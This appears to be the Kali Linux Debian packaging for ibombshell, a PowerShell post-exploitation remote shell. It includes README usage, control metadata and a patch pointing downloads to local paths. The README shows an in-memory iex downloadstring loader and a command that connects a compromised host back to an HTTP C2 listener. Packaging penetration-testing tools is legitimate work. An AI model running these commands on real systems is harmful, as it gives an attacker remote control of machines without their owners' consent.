Initial release
Sophie Brun
4 years ago
|
0 |
ibombshell in Kali
|
|
1 |
------------------
|
|
2 |
|
|
3 |
## ibombshell everywhere
|
|
4 |
|
|
5 |
When the package ibombshell is installed in Kali you can load ibombshell
|
|
6 |
with:
|
|
7 |
|
|
8 |
```[powershell]
|
|
9 |
iex (new-object net.webclient).downloadstring('/usr/share/ibombshell/console')
|
|
10 |
```
|
|
11 |
|
|
12 |
And then run the ibombshell console:
|
|
13 |
|
|
14 |
```[powershell]
|
|
15 |
console
|
|
16 |
```
|
|
17 |
|
|
18 |
|
|
19 |
## ibombshell silently mode
|
|
20 |
This version allows you to run the ibombshell console and remotely control it from the C2 panel created in python. To run this version, first you must launch the console process in powershell:
|
|
21 |
|
|
22 |
```[powershell]
|
|
23 |
iex (new-object net.webclient).downloadstring('/usr/share/ibombshell/console')
|
|
24 |
```
|
|
25 |
|
|
26 |
prepare the C2:
|
|
27 |
```[shell]
|
|
28 |
ibombshell
|
|
29 |
```
|
|
30 |
And create the listener where the warriors will connected:
|
|
31 |
|
|
32 |
```[ibombshell]
|
|
33 |
iBombShell> load modules/listener.py
|
|
34 |
[+] Loading module...
|
|
35 |
[+] Module loaded!
|
|
36 |
iBombShell[modules/listener.py]> run
|
|
37 |
```
|
|
38 |
|
|
39 |
The default listener port is 8080. Finally you can launch the console in silently mode on the host to get remote control:
|
|
40 |
|
|
41 |
```[powershell]
|
|
42 |
console -Silently -uriConsole http://[ip or domain]:[port]
|
|
43 |
```
|
|
44 |
|
|
45 |
|
|
46 |
More information in /usr/share/doc/ibombshell
|
|
0 |
ibombshell (0~git20200226-0kali1) kali-dev; urgency=medium
|
|
1 |
|
|
2 |
* Initial release
|
|
3 |
|
|
4 |
-- Sophie Brun <[email protected]> Thu, 27 Feb 2020 10:40:34 +0100
|
|
0 |
Source: ibombshell
|
|
1 |
Section: misc
|
|
2 |
Priority: optional
|
|
3 |
Maintainer: Kali Developers <[email protected]>
|
|
4 |
Uploaders: Sophie Brun <[email protected]>
|
|
5 |
Build-Depends: debhelper-compat (= 12)
|
|
6 |
Standards-Version: 4.5.0
|
|
7 |
Homepage: https://github.com/ElevenPaths/ibombshell
|
|
8 |
Vcs-Browser: https://gitlab.com/kalilinux/packages/ibombshell
|
|
9 |
Vcs-Git: https://gitlab.com/kalilinux/packages/ibombshell.git
|
|
10 |
|
|
11 |
Package: ibombshell
|
|
12 |
Architecture: all
|
|
13 |
Depends: ${shlibs:Depends}, ${misc:Depends},
|
|
14 |
powershell,
|
|
15 |
python3-termcolor,
|
|
16 |
python3-pynput
|
|
17 |
Description: Dynamic Remote Shell
|
|
18 |
This package contains a tool written in Powershell that allows you to have a
|
|
19 |
prompt at any time with post-exploitation functionalities (and in some cases
|
|
20 |
exploitation). It is a shell that is downloaded directly to memory providing
|
|
21 |
access to a large number of pentesting features. These functionalities can be
|
|
22 |
downloaded directly to memory, in the form of a Powershell function. This form
|
|
23 |
of execution is known as everywhere.
|
|
24 |
.
|
|
25 |
In addition, ibombshell provides a second execution mode called Silently, so
|
|
26 |
the pentester can execute an instance of ibombshell (called warrior). The
|
|
27 |
compromised computer will be connected to a C2 panel through HTTP. Therefore,
|
|
28 |
it will be possible to control the warrior and be able to load functions in
|
|
29 |
memory that help the pentester. This is happening whithin the
|
|
30 |
post-exploitation phase.
|
|
0 |
Format: https://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
|
|
1 |
Upstream-Name: ibombshell
|
|
2 |
Source: https://github.com/ElevenPaths/ibombshell
|
|
3 |
|
|
4 |
Files: *
|
|
5 |
Copyright: ElevenPaths
|
|
6 |
License: GPL-3
|
|
7 |
|
|
8 |
Files: debian/*
|
|
9 |
Copyright: 2020 Sophie Brun <[email protected]>
|
|
10 |
License: GPL-3
|
|
11 |
|
|
12 |
License: GPL-3
|
|
13 |
This package is free software; you can redistribute it and/or modify it
|
|
14 |
under the terms of the GNU General Public License version 3 as published
|
|
15 |
by the Free Software Foundation.
|
|
16 |
.
|
|
17 |
This package is distributed in the hope that it will be useful,
|
|
18 |
but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
19 |
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
20 |
GNU General Public License for more details.
|
|
21 |
.
|
|
22 |
You should have received a copy of the GNU General Public License
|
|
23 |
along with this program. If not, see <https://www.gnu.org/licenses/>
|
|
24 |
.
|
|
25 |
On Debian systems, the complete text of the GNU General
|
|
26 |
Public License version 3 can be found in "/usr/share/common-licenses/GPL-3".
|
|
0 |
#!/bin/sh
|
|
1 |
|
|
2 |
set -e
|
|
3 |
|
|
4 |
cd /usr/share/ibombshell/ibombshell\ c2
|
|
5 |
exec python3 ibombshell.py "$@"
|
|
0 |
README.md
|
|
1 |
papers/*
|
|
2 |
debian/README.*
|
|
0 |
console usr/share/ibombshell
|
|
1 |
functions.txt usr/share/ibombshell
|
|
2 |
ibombshell*c2 usr/share/ibombshell
|
|
3 |
data usr/share/ibombshell
|
|
4 |
debian/helper-script/* usr/bin
|
|
0 |
From: Sophie Brun <[email protected]>
|
|
1 |
Date: Tue, 10 Mar 2020 15:34:56 +0100
|
|
2 |
Subject: Use the installed files in console
|
|
3 |
|
|
4 |
---
|
|
5 |
console | 6 +++---
|
|
6 |
1 file changed, 3 insertions(+), 3 deletions(-)
|
|
7 |
|
|
8 |
diff --git a/console b/console
|
|
9 |
index c55932e..978d655 100644
|
|
10 |
--- a/console
|
|
11 |
+++ b/console
|
|
12 |
@@ -112,9 +112,9 @@ function console{
|
|
13 |
|
|
14 |
|
|
15 |
#Important: URL download ibombshell
|
|
16 |
- $gtRawBase = "https://raw.githubusercontent.com/ElevenPaths/ibombshell/master/"
|
|
17 |
+ $gtRawBase = "/usr/share/ibombshell/"
|
|
18 |
$gtRawFunctions = "data/functions/"
|
|
19 |
- $functionsList = "https://raw.githubusercontent.com/ElevenPaths/ibombshell/master/functions.txt"
|
|
20 |
+ $functionsList = "/usr/share/ibombshell/functions.txt"
|
|
21 |
[System.Collections.ArrayList]$global:functionsLoaded = "showcommands" , "showfunctions" , "quit"
|
|
22 |
[System.Collections.ArrayList]$global:internalFunctions = "detect-OS", "printprompt" , "printMessage", "printData", "isadmin", "commandsearch", "addcommand"
|
|
23 |
#Condition for exit
|
|
24 |
@@ -314,4 +314,4 @@ results=$results
|
|
25 |
}
|
|
26 |
}
|
|
27 |
}
|
|
28 |
-}
|
|
29 |
\ No newline at end of file
|
|
30 |
+}
|
|
0 |
Use-the-installed-files-in-console.patch
|
|
0 |
#!/usr/bin/make -f
|
|
1 |
#export DH_VERBOSE = 1
|
|
2 |
|
|
3 |
%:
|
|
4 |
dh $@
|
|
0 |
ibombshell source: source-contains-prebuilt-windows-binary *
|
|
0 |
version=4
|
|
1 |
opts="filenamemangle=s%(?:.*?)?v?(\d[\d.]*)\.tar\.gz%ibombshell-$1.tar.gz%" \
|
|
2 |
https://github.com/ElevenPaths/ibombshell/tags \
|
|
3 |
(?:.*?/)?v?(\d[\d.]*)\.tar\.gz debian uupdate
|